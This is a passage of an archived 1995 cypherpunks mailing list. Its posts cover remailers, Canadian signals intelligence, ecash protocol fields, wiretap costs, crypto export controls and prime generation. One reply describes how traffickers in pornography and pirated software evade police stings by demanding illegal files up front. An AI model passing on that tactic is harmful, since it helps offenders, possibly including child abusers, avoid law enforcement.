Almost anything on the Internet about East Timor is just crap. Get that out
of the way first. I've put the entire Portugal domain in my kill file. It's
like reading the lowest grade of anti-abortion rant from an AOLer.

The issue under all the others is "what happens when Suharto dies". 
Lots of people, both in and out of power, are biding their time until
Suharto leaves power.

My hunch is that practically nobody in Indonesia has a PC at home like
most US Internet users do. They're getting access through a company or
university, or through a government office. A distributed network can
resist censorship--but Indonesia isn't very distributed yet, and almost
everyone is dependent on some sort of institutional access. Most people
in Indonesia--including a lot of middle-class people--don't have a phone.
You run down the street to a government Telkom office or a private 
Wartel office to make a phone call. Putting Web terminals in Wartels--
now *that would be a concept.

If you dig into the UUCP maps for Java, you'll see a surprising number
of sites listed in all sorts of little places. How many of those are
up and operating, I have no idea. You are routinely warned that people
at those sites are generally charged for receiving foreign e-mail, and
that that can be expensive for them at current exchange rates.

Private Internet providers (RadNet, IDOLA, IndoNet) have popped up
only in the last year or so. I have links to some from my home page
(http://www.skypoint.com/members/gimonca)

As for the rubber hose...Indonesia is a fairly inscrutable country to
try to figure out. They are quite capable of simply killing people if
necessary; at other times, the wheels of justice turn agonizingly slow,
and people are left free for the moment not knowing what might end up
happening (a la Phil Zimmerman). My at-a-distance impression is that
you see more of the Alabama-Sheriff's-Deputy kind of oppression than 
the Nazi-jackboot kind. Either way, it's millions of light years from
the Libertarian Home World.

Technology is a hot issue in Indonesia, partly because one of Suharto's
favorite ministers, Mr. Habibie, is kind of a techno-nut, and has been
pushing a variety of medium- and high-tech projects for Indonesia. Some
people feel that he's being allowed to do whatever he wants, regardless
as to whether his projects make any economic sense or not. After Suharto
is gone, it will be interesting to see how high-tech stuff fares. In
short, will Habibie end up giving it a bad name? Or will the technological
middle class come to power and do it right the second time around?

I'm going to stop rambling, and add something of more crypto-relevance.
I've got an old article of mine about remailers in my web pages.
(http://www.skypoint.com/members/gimonca/anonmail.html) I've talked it
up in soc.culture.indonesia and soc.culture.malaysia. Later, sameer
asked me to put a link to c2.org in there. Now, I'm getting a low but
respectable number of hits on that page (30-40 per day)...so it's not
out of the question that some of those Indonesian users might be 
finding their way to sameer's site for a badly-needed nym.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 18 Nov 95 06:07:15 PST
To: cypherpunks@toad.com
Subject: CANADIAN PRESS REPORTS (was Re: CSE gets flak on TV)
Message-ID: <199511181405.GAA10722@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 17 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> > Hmm, actually the news tape is reading a little strange here in Canada.
> > Not AP, or REUTERS, but simply the Canadian Press newswire.

     [snip]

> Taking three successive news stories from three days ... (press stories,
> I've since pulled for my own reference) and pasting them together to
> indicate some type of Machiaevellian?? (sp) exercise is simply "not done." 

I still feel such a sense of violation with what LD did, such an utter
sense of helplessness at the character assassination I've suffered at his
hands, that I feel that I must take some token action to "set the
record straight".  Something which clears my name.

Here is the TRUE unedited story for the list which Deitweiler felt he
had to TWIST to the nth degree.  His attempt at making mountains out
of mole hills will not succeed with this one.

I won't have him attack me, and attack everything I'm trying to
achieve on this list, through his games.  It's a non-starter from the
get go, LD.

Here's what was truly written ... let the list decide for itself.



COMMUNICATIONS SECURITY ESTABLISHMENT
Canada spied on allies: ex-agent

Top secret security agency accused of eavesdropping
on South Koreans by former analyst

The Canadian Press 
TORONTO

  Canada's electronic espionage agency has spied on friendly countries
such as South Korea, Mexico and Japan despite Ottawa's denials, a
former agent has told CTV News.
  "I have lived with this information for so long and I just think
that it is time that Canada knows what CSE is doing, " Jane Shorten
said in a report for broadcast late Sunday.
  Shorten, 38, worked as an analyst from 1986 to 1994 -- when she was
laid off -- for the Communications Security Establishment (CSE), CTV
reports.
  A separate entity from the better known Canadian Security
Intelligence Service, CSE can be described as a technological peeping
tom.  It specializes in electronic espionage, monitoring radio and
other transmissions for useful information.
  The Soviets and their allies were once the prime targets of such
surveillance, but after the thaw in the Cold War, CSE shifted its
attention to friendly countries, Shorten told CTV.
  The agency spied on Canada's allies and trading partners,
eavesdropping on friendly embassies, consulates, diplomats in Canada
and around the world, she said.
  Ottawa denies it.  "Countries like Canada have understandings that
they don't carry out these activities against each other, " Solicitor
General Herb Gray said earlier this year in response to claims that
the U.S. Central Intelligence Agency had spied on the Japanese
delegation during auto trade talks in Geneva.
  Replies Shorten: "He does not know what's going on because CSE is
certainly doing that ... I spied on the (South) Korean government for
the Canadian government."
  CSE is part of the Defence Department but Shorten insists senior
officials at the Foreign Affairs Department were fully aware of its
activities and anxious for its information.
  "I know my reports went to the Ministry of Foreign Affairs," Shorten
told CTV. "My reports were classified as Top Secret Umbra and that's
as high as you can get, and these people were cleared to get that kind
of information."
  Shorten, once described by a superior as a gifted intelligence
analyst, told CTV she was aware her revelations could result in
prosecution under the Official Secrets Act but felt the risk of prison
was worth it.
  "I feel so strongly that it's time that people learned what CSE is
all about," she said.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Sat, 18 Nov 95 14:36:10 PST
To: cypherpunks@toad.com
Subject: Re: protecting against impersonation (was: CANADIAN PRESS REPORTS)
Message-ID: <m0tGv2j-0008zeC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>anonymous writes:
>> I still feel such a sense of violation with what LD did, such an
>> utter sense of helplessness at the character assassination I've
>> suffered at his hands, 
>
>So use PGP, sign your messages.  Simple solution.

Absolutely!  Anybody who uses anonymous remailers to post to public areas,
and does not use digital signatures to prevent spoofing when it is obviously
needed, is a fool or worse.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Date: Tue, 21 Nov 95 13:47:02 PST
To: cypherpunks@toad.com
Subject: ecash protocol: Part 1
Message-ID: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Well, I dropped off the net for a few days due to a midterm, but I'm
back now...

Last week, I was taking a look at the ecash protocol (no, I don't have a copy;
I have a binary, which I can't even run...).  

I've managed to decipher a useful bit of the first message sent from
the shop to the payer.  It's the Payment Request, and contains the following
information:

o Header identifying packet as Payment Request
o The integer 4
o The payment amount, in cents
o The time (seconds since 1970)
o The integer 79
o The name of the shop (payee)
o A description of the item being paid for
o An empty string
o The integer 0
o End of Record marker

I don't know what the 4, 79, empty string, and 0 are for.  I assume one
of them (probably the 4) is some indication of currency (US cents).
I can provide a byte-level description of the record, if people want.

I guess the important bit is that the payee, the item being bought,
and the cost are sent _in the clear_.  Some of the people I've talked
to think this is a huge privacy breach, and some don't.  You all can
debate this now.  Lucky can, if he wishes, add insight, and/or tell us
what DC may do about this.

I'll try to figure out the rest of the fields, and some of the other
messages (like the payment itself).

   - Ian "Why exactly isn't DigiCash releasing the protocol?  What about
	    the source?"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 21 Nov 95 13:51:04 PST
To: pcw@access.digex.net (Peter Wayner)
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
Message-ID: <199511212150.QAA02220@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:05 AM 11/21/95 -0500, Peter Wayner wrote:

>Has anyone ever done the math on the FBI's new wire tapping
>proposals and determined whether they'll have enough agents to
>do all of the listening? Doesn't a court ordered wire tap
>require that people listen in and screen the recordings. Does

No.  Automatic equipment (pen registers) is almost as old as wiretaps.

>12,500 agents would cost $1.2 bill
on a year if they each cost
>about $100,000 in salary and benefits. But we need to account
>for vacations, shift work and testifying the trials of the drug
>lords who are sent to jail. Let's assume that you only need
>1/10th the people to handle the two evening shifts. That gives
>you a cost of $1.4 billion before vacations. Adding 40% to cover
>vacation and weekends puts you close to $2 billion. Let's round
>up.

The bodies are still needed for management, analysis, arrest, prosecution,
and punishment.  Until Robocop is deployed, the criminal justice system will
be a labor intensive effort.  This is still good news for us though.  Anyone
who's been in business (say George McGovern after his Connecticut inn
bankruptcy) can tell you that people are the most expensive part of a
business.  You pay all that cash each year and at the end of the year you
have nothing concrete to show for it.  You are just buying time.  Labor
costs become more of a problem as the quantity and value of capital goods
increases since the more slowly increasing factor (labor) is bid up.  Thus
people cost a lot more these days than they did in 1800 because capital
goods (per unit) are much cheaper than they used to be.

(Ignore temporary changes in returns to labor as women, 3rd world residents,
or freed commie slaves join the labor force.  They are quickly absorbed.
Wants are unlimited.)

Now the increasing cost of labor is not a problem if those workers are
producing goods of value.  They are "making" their own earnings.  If they
are in a parasitic profession, however, -- one that subsists on what it
steals from others -- the rising cost of labor means that that institution
has to steal more and more to keep up.  Eventually, the speed of economic
change can swamp the theft ability of such an organization.

Such swamping occurs because market entities support their own growth or
they don't grow.  Since they lift themselves up, growth is unlimited.
Parasitic entities on the other hand are limited by the strength and
susceptibility of their host.  Hosts may weaken if the parasite grows too
much or it may find a way to cast off the parasite.  No one rejects a market
economic actor that is a potential customer or employer but parasites are
rejected whenever possible.

Market Earth on the nets gives us many opportunities to both fuel fast
growth and shake off parasites.  It is perfectly possible for markets to
outbid the secret police for the labor of its agents given the compound
growth rates that are a feature of friction-free capitalism.

DCF

"Don't call it Anarchy.  Call it Disintermediation."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Tue, 21 Nov 95 21:37:43 PST
To: remailer-operators@c2.org
Subject: Re: Syrinx Remailer is no more
Message-ID: <acd8650b03021004a42c@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This is the kind of announcement which really needs to be authenticated.
I will leave syrinx on my list until I see a signed message confirming this
announcement. If we do not bother to authenticate this kind of message, why
bother with all the crypto, here is the mother of all denial of service
attacks.


        -Lance

At 7:22 PM 11/21/95, Sam Kaplin wrote:
>Effective immediately syrinx@c2.org is no more. I no longer have the
>time to keep this remailer up and running. Perhaps somewhere down the
>line I will set up another one. Please remove Syrinx from your chains.
>
>Sam

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMLK1+vPzr81BVjMVAQHgoAf/TpVsZ+St9vz4ix5PLaabP60ybJRATE+V
t2iBxQmxRqhOcdVPZJU1An5pUdCOCgB3amLXNJXkMnoOasi/0ps3igOw0uFaFUf8
ZgCvM4MfNsdPfduCRfsb+5a1IvTkhmP6oapX9lUXDB5a4nHRQvtXkt96sg2hgaIj
sqwPpGFaFvLhkiqQ971CL3+EV4+0GkZ3iH2g5pQ2BD6iACVBReINgCuyi/LiNbvZ
yGBguPb38VTCDWbzancgQVrMEzTdwcQrmhfhHDO/5H5g6reWrEMioKGWScTZgxH1
fMs40LXxwu25cUziywYjgw9uhEEQu1K1GY7sVE3CoPPenRfcKAutsA==
=c2AJ
-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 21 Nov 95 21:45:56 PST
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <yo9XeD2w165w@bwalk.dm.com>
Message-ID: <9511220545.AA01344@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



I'm not sure where the policy of whether posts from foo.com should be
considered policy of foo.com but they certainly are considered in that
manner.

Rather than have this discussion here how about people read up the threat in
Hal Abelson's course on Ethics of the Electronic frontier?

http://swissnet.ai.mit.edu/6095/on-line-discussion/topic-1/

One point to be made is that at Universities we all have university accounts 
because people realise that there is no connection between our views and 
institute policy. The freedom to hold unpopular views being part of what 
universities are all about. On the other hand there is no such assuption 
concerning posts from foo.com.

I suspect that even in the UK one could sack an employee for making stupid 
statements from an Internet account. Particularly if they might lead a person to 
doubt the sanity of the person concerned.

On Phil Stromer, I don't think the Internet posts were the only point at issue. 
He was very offensive however, it was not merely the views he posted but the 
manner in which he made them that caused offense. He also made a lot of 
assertions concerning other posters which might have led to legal action 
against Sun.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 22 Nov 95 04:10:13 PST
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <199511221048.CAA26409@jobe.shell.portal.com>
Message-ID: <i6uyeD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice de Nonymous writes:
> What I'm trying to say is that if someome posts from watson.ibm.com,
> and IF they are talking about OS/2, we will not accept that they are
> not speaking independantly of the knowledge they have garnered from
> watson.

I fully agree. I'm not arguing with you.

> In the same way, someone who writes from Netscape.com or AT&T, or Sun
> and tries to disclaim that they are speaking for the company, when
> they step out as an employee of a company is deluding themselves.

If you meant "disclaim that they are NOT speaking for the company", then that's
what I was saying too. Moreover, I think that if someone known to work for Sun
posts from Netcom about Sun products, policies, and future plans, s/he'll have
both higher credibility and higher responsibility to the readers than a
proverbial person from the street.

(Sorry for not being able to take this to e-mail.)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 22 Nov 95 09:09:18 PST
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: Secrets of the Internet
In-Reply-To: <Pine.BSD.3.91.951122041435.28519I-100000@ahcbsd1.ovnet.com>
Message-ID: <Pine.SOL.3.91.951122090738.23852B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, James M. Cobb wrote:
>            known as PGP -- Pretty Good Privacy -- 
> and 
>    Experts estimate that it could take 10 years for computer 
>    systems to crack the individual codes. 

Never underestimate the power of GCHQ- when they unfreeze Alan Turing 
from the cryogenic vault, good things happen.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 22 Nov 95 08:10:33 PST
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: rand-test
In-Reply-To: <Pine.BSD.3.91.951122041655.28519J-100000@ahcbsd1.ovnet.com>
Message-ID: <199511221609.LAA21172@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"James M. Cobb" writes:
> Friend, 
>  
>  
> The following information from 

1) You are not my friend.

2) My private mail to you hasn't convinced you to stop this barrage of
   reposts. Would you please do so?

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 22 Nov 95 08:51:06 PST
To: raph@c2.org
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <199511212323.PAA02457@comsec.com>
Message-ID: <9511221641.AA14712@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sat, 18 Nov 1995 00:42:21 -0800 (PST)
>From: Raph Levien <raph@c2.org>


>   First, a few words about what I consider to be good interface that
>can support plug-in crypto.

[...]

>   I propose that the new interface lives as a sort of daemon, rather
>than a static collection of command line script pieces. 

Danger, Will Robinson!  (see below)

[...]


>   Once the negotation has been established, the application can send
>the daemon MIME objects that the app does not understand but the
>daemon does (for example, an image/fractal). The daemon can return a
>MIME object that the app does understand (for example, an image/ppm).

This part sounds good...a sort of master translation service.

>   Alternatively, the daemon may request an authentication. This is
>useful when resolving external bodies that require authentication,
>including non-anonymous FTP, and standard authenticated HTTP. In this
>case, the daemon sends a message to the app requesting the
>authentication. It specifies whether it needs both username and
>password, or just password. In the latter case, it hands a username to
>the application.
>   The application can then query the user for the authentication
>data. It hands this back to the daemon. In reply, the daemon indicates
>success or failure. In case of success, it hands the object back to
>the app.

Now I get worried.  This communication with the demon is via some IPC --
maybe even via a LAN.  Some things can't be distributed safely and
authentication is #2 on my list.

>   Encryption is a bit more tricky, but in essence you just hang a
>premail-alike off this kind of protocol. The hard part is specifying
>the key, but you just call it a "parameter" and put in hooks for the
>daemon to ask for whatever parameters it needs. 

Crypto keys are #1 on my list of things you can't distribute (unless they
are wrapped, of course).

>						 This requires that
>keys have some nonforgeable names, which is unfortunately not a
>feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
>Certifcation Authority (<wink> at Nick Szabo).

Public keys, if that's what you're talking about, have perfectly good
nonforgeable names -- themselves.  They are unique.  They are the proper
name which can collect all the attributes of that key which are of interest
(e.g., permission to spend $, name of a human who knows the private key,
attributes about that human, etc.).

>   One final aside: I've been fairly frustrated with this mailing list
>as a forum for talking about real design proposals and implementation
>issues. Ignorant posts by the likes of Dr. Fred and Alice d'Clueless
>tend to attract far more attention than real crypto work. I want a
>forum for, and just for, cypherpunks who write code. If I had just a
>smidgen more free time (as if), I'd be trying to start one
>myself. Anyone else?

I've seen this happen several times.  As a list gets popular, it
diversifies.  You might try sci.crypt.research -- since it's moderated.

 - Carl


+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Wed, 22 Nov 95 08:54:21 PST
To: cypherpunks@toad.com
Subject: Re: Pedophiles use encoding devices to make secret use of Internet
Message-ID: <Pine.BSD/.3.91.951122114132.23151A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


I guess they moved the URL. Try this one.

http://www.nando.net/newsroom/ntn/info/112195/info429_4.html

      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Wed, 22 Nov 95 17:14:11 PST
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
Message-ID: <199511230113.RAA01841@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> > 
> >         I do what RSADSI does with ftp.rsa.com. It requires a cronjob
> > and sed. I didn't get the NSA to approve it, but I figure if it's good
> > enough for RSADSI it's good enough for me.
> 
>   Do you have a legal opinion to support this statement?  Our lawyers
> tell us that executives of netscape could go to jail if we make the
> 128bit version of netscape available from an "export controlled"
> ftp or http server.  We are working to clarify the situation with
> the government or figure out an alternative distribution scheme that
> will remove us from the grey area.
> 
>   Getting the US version of netscape widely available is one of my
> highest priorities, but I can't tell Barksdale that he should go to
> jail over it.  I'm constantly pushing from within the company to keep
> things moving forward.

Actually ;-) Barksdale going to jail would probably advance the cause of
strong cryptography more than anything I can think of.  Can you imagine
the media circus when he's led out the door in handcuffs?  A man worth
somewhere around a billion dollars being arrested for trying to give away
his product?  Court reporters trying to explain ITAR to the public?  The
mind boggles.

... and he looked over at me and said, "What are ya in for?" and I said,
"Giving away free software," and they all moved away from me on the bench ...

You guys didn't get to where you are now waiting around for HTML v3.0 to
be approved.  There must be some way to challenge an attempt to use ITAR
to stop the DOMESTIC spread of strong crypto that doesn't involve the
incarceration of your top executives ...

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: post@txcc.net
Date: Wed, 22 Nov 95 16:47:10 PST
To: perry@piermont.com
Subject: Re: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
Message-ID: <199511230245.SAA00660@txcc.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:28 PM 11/22/95 -0500, you wrote:
>
>A.Back@exeter.ac.uk writes:
>> It is much more efficient of list bandwidth to post short pointers
>> only, of the style John Young <jya@pipeline.com> posts.
>
>I agree with you.  John's posts are not always strictly on topic but
>they are always just pointers, and he typically posts them in a single
>group a day. They are also always very high quality information. I
>find them to be perfectly fine. 
>
>The recent "Friend;" stuff just annoyed me, though.
>
>Perry
>
>
I agree with you.

Sid





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 22 Nov 95 19:08:07 PST
To: iang@cs.berkeley.edu
Subject: Re: ecash protocol: Part 1
Message-ID: <v02120d05acd986f50e5e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



> From what I gathered from Doug's posts a little while back, the _client_
>stuff is perfectly fine; only the _bank_ stuff is Chaum-patented.
>

This is exactly backwards. Also, it is entirely possible that they
have structured the protocol to make sure that both sides have to
practice some element of Digicash intellectual property. What I
said was "it is possible to create an anonymous digital cash system
where the bank does not infringe and the client can optionally
infringe or not infringe (sacrificing anonymity)."

(See: http://www.communities.com/paper/agnostic.html)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc>
Date: Wed, 22 Nov 95 19:49:05 PST
To: sunder@amanda.dorsai.org (Ray Arachelian)
Subject: Re: Visual Basic 4.0 encryption prog.
In-Reply-To: <Pine.SUN.3.91.951122153315.26251W@amanda.dorsai.org>
Message-ID: <199511230443.WAA07909@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> But there is no reason why this isn't possible in ANY language.  You'll 
> just have to write a lot of code by hand, or port to VB... especially the 
> large-number routines.

I don't see any reason why crypto routines written in C can't be 
converted to .DLL files - then you can call them from VB or whatever.  No 
need to convert them to VB.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLP75yS9AwzY9LDxAQFNOAP+JizKSm76+ktgzM7mbF05l5KwwfIDVL2u
kPsL9aIEmQLNl9IfF6Q/ROPTL8U9QJRdzUhyOPTlCV2TFZfA48e4W68Nqa6AX+up
lMedQuxIjqclK8vJzj1uKOP0/HhbOyn1RLLwthNGWXXt+WM882Vq6NES/eB+kwGN
o3/fDEMIg2g=
=PhJu
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "banjo, lord of the sea monkeys" <kelli@zeus.towson.edu>
Date: Wed, 22 Nov 95 20:52:53 PST
To: cypherpunks@toad.com
Subject: Nicholas Negroponte interview in MEME
Message-ID: <Pine.ULT.3.91.951122234358.4115A-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain



The latest issue of MEME has a pretty good interview with Nicholas 
Negroponte of the MIT Media Lab.  Some privacy issues are discussed, the 
idea of intellectual property is touched on, as well as some other good 
stuff.

I'm not sure if it's on the web, but I'll forward the interview to anyone 
who would like to have it.

K. Ellis


OBCrypto:  How's it going, Perry?  

<grin>
Kathleen M. Ellis     http://zeus.towson.edu/~kelli/     kelli@zeus.towson.edu
Diverse Sexual Orientation Collec. Towson State University DSOC@zeus.towson.edu
"Your friends are really just enemies who don't have the guts to kill you"
       							-J. Tenuta






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Thu, 23 Nov 95 00:12:11 PST
To: Carl Ellison <cme@clark.net>
Subject: Re: crypto for porno users
Message-ID: <199511230817.AAA22826@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>	a) "no one on the net knows you're a dog" implies that police can
>	pose as a fellow porn producer or consumer and get away with it
>	more easily.
>
>	b) strong crypto for communications between porn users encourages
>	them to speak more freely.  When one of the two is a police officer
>	in disguise, that encourages the other (the suspect) to reveal more,
>	making the investigation proceed more quickly.  Knowing that the
>	crypto is strong enough to keep government eavesdroppers out, the
>	sender is given a false sense of security -- is distracted from
>	thinking about the trustworthiness of the receiver while thinking
>	about the security of the channel itself.

A common way to get around prostitution sting operations is to ask the lady
to expose sensitive portions of her anatomy to prove her sincerity before
the would-be customer commits to any transactions; this sort of thing is
also becoming commonplace on the net for pornography or pirated software,
too. Would-be trafficers often ask a prospective recipient for a small chunk
of fresh files in advance, before passing back anything serious .. partially
out of suspicion, mostly out of greed, but to the same end. A law
enforcement team would be stepping onto shaky ground if they were forced to
transfer illegal images/etc to a suspected trafficer before getting evidence
from him. Entrapment is an ugly concept.

>3. Encryption of porn would work against the kind of porn distribution
>	found on the alt.binary.pictures.erotic... newsgroups.  Encryption
>	requires that recipients be identified.

Not at all .. a porn distributor could generate a key pair, use part A to
encode the images, and dessiminate part B thru a variety of outlets -
publicly posted, sold, passed thru an informal network of like-minded
netizens...

>4. Personal file encryption encourages individuals dealing with porn to
>	encrypt and keep personal diaries which might contain evidence.
>	Since PGP is subject to brute force passphrase attacks, this gives
>	an attack which will open *some* of these diaries.  Without the
>	encryption, the suspect is less likely to keep the diary in the
>	first place.  This isn't a guaranteed opening into all such
>	diaries.  There is no such guarantee possible.  Rather, this
>	suggests that strong crypto has a chance to maximize the effective
>	"take" by LE forces.

I would argue the exact opposite - strong crypto would tend to minimize the
effective take, since there's no guarantee that /anything/ on a perp's
system will be in the clear. I'll let someone else with a better background
pound on the 'brute force' section.

--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Wed, 22 Nov 95 22:34:06 PST
To: cypherpunks@toad.com
Subject: crypto for porno users
Message-ID: <199511230633.BAA05538@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


I hear occasional uproar from LE types about porno traffickers using strong
crypto like PGP.

[I've been known occasionally to say things for their shock value, but this
time I'm quite serious.]

		------------------------------

As a society wanting to limit the spread of porn, we should encourage those
trafficking in porn to use strong crypto.

1. If two people are sending porn from one to another over the net, the net
	is so insecure that many people along the way could see it.  The
	recipient field could be mistyped, as well.  Either way, someone
	who doesn't want the porn could receive it and be offended.  Strong
	crypto wrapping that porn protects the innocent accidental
	recipient from exposure to the porn.

2. If cops want to track down some pornographer (e.g., because he's dealing
	in child porn), the net and strong crypto provide two opportunities
	to the police:

	a) "no one on the net knows you're a dog" implies that police can
	pose as a fellow porn producer or consumer and get away with it
	more easily.

	b) strong crypto for communications between porn users encourages
	them to speak more freely.  When one of the two is a police officer
	in disguise, that encourages the other (the suspect) to reveal more,
	making the investigation proceed more quickly.  Knowing that the
	crypto is strong enough to keep government eavesdroppers out, the
	sender is given a false sense of security -- is distracted from
	thinking about the trustworthiness of the receiver while thinking
	about the security of the channel itself.

3. Encryption of porn would work against the kind of porn distribution
	found on the alt.binary.pictures.erotic... newsgroups.  Encryption
	requires that recipients be identified.

4. Personal file encryption encourages individuals dealing with porn to
	encrypt and keep personal diaries which might contain evidence.
	Since PGP is subject to brute force passphrase attacks, this gives
	an attack which will open *some* of these diaries.  Without the
	encryption, the suspect is less likely to keep the diary in the
	first place.  This isn't a guaranteed opening into all such
	diaries.  There is no such guarantee possible.  Rather, this
	suggests that strong crypto has a chance to maximize the effective
	"take" by LE forces.


These advantages are balanced against the possibility that there is some
group of pornographers who communciate together, who are identified by the
police, who would be wiretapped *and* who are not infiltrated -- and
therefore whose conversations are unavailable to the police.  The larger
such a group, the less likely it will remain non-infiltrated, so these
groups are probably very small.  There might be some of these -- just as
there might be a few pornographers who have diaries that are encrypted and
unbreakable.  However, strong crypto opens a number of opportunities for
successful investigation -- and it's my guess that in the balance, strong
crypto adds up as a net advantage to the police rather than a net drawback.

 - Carl

 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 23 Nov 95 03:08:12 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: generating provable primes
Message-ID: <Pine.SUN.3.91.951123024142.12404A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Several days ago someone (I forgot who he was) asked about code for 
primality tests.  I just implemented an algorithm to generate random 
provable primes that is only about 50% slower than generating probable 
primes.  It will be in the next version of Crypto++, but I've attached 
code for the main function in case anyone is interested in the 
algorithm.  Full description can be found in "Fast Generation of Prime 
Numbers and Secure Public-Key Cryptographic Parameters" by U.M. Maurer in 
Journal of Cryptology, Volume 8 Number 3, 1995.  The paper also describes 
a more complicated algorithm that produces primes with a more uniform 
distribution.

There was discussion some days ago about generating strong primes 
for DH exchange moduli.  Eric Young reported that he spent tens of hours 
of CPU time to generate a 4096 bit prime p such that (p-1)/2 is also 
prime.  However, there is really no reason why DH exchange moduli must be of 
